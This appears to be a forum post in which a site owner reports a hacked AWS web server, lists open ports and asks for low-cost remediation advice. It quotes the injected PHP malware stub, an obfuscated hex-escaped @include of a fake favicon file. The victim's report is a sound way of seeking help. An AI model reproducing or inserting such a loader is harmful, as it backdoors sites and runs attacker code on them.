I developed a new website which I installed in a new server and just two days ago pointed the domain to that server.
However strange things are happening now such as index.html being renamed to index.html.bak.bak and index.php is appearing.
Following code is appearing in index.php and in existing index.php new code is being added such as :
php /6e980/
@include "\x2fh\x6fm\x65/\x732\x61n\x61l\x79t\x69c\x73/\x70u\x62l\x69c\x5fh\x74m\x6c/\x54A\x53c\x65n\x61r\x69o\x2fQ\x75e\x72y\x2ff\x61v\x69c\x6fn\x5fa\x365\x399\x65.\x69c\x6f";
/6e980/
echo file_get_contents('index.html.bak.bak');
Suddenly i observed a folder namely forum got created with a lone php file called 5w4xg.php. JQuery files are becoming blank or contains weird headers.
It is a linux server running on AWS. I think its either been hacked or has malware.
I am advised to - Install SSL - Website can have SiteLock (https://www.sitelock.com/) for regular scan of website files and database. - Website can have Comodo Web Application firewall on the server which will prevent from SQL and XSS attacks. - Install ClamAV anti virus for cPanel.
While someone is saying on install SSL, ClamAV and Wordfence.
I don't know what to do ?
I also have following ports open :
TCP 21 0.0.0.0/0
TCP 21 ::/0
TCP 22 0.0.0.0/0
TCP 25 0.0.0.0/0
TCP 25 ::/0
TCP 53 0.0.0.0/0
TCP 53 ::/0
TCP 80 0.0.0.0/0
TCP 80 ::/0
TCP 110 0.0.0.0/0
TCP 110 ::/0
TCP 143 0.0.0.0/0
TCP 143 ::/0
TCP 443 0.0.0.0/0
TCP 443 ::/0
TCP 465 0.0.0.0/0
TCP 465 ::/0
TCP 587 0.0.0.0/0
TCP 587 ::/0
I need ports only for : a) uploading files from my workplace b) connecting to MySQL db c) mail system to work
Please advice what can I do and something that's involves minimal cost.
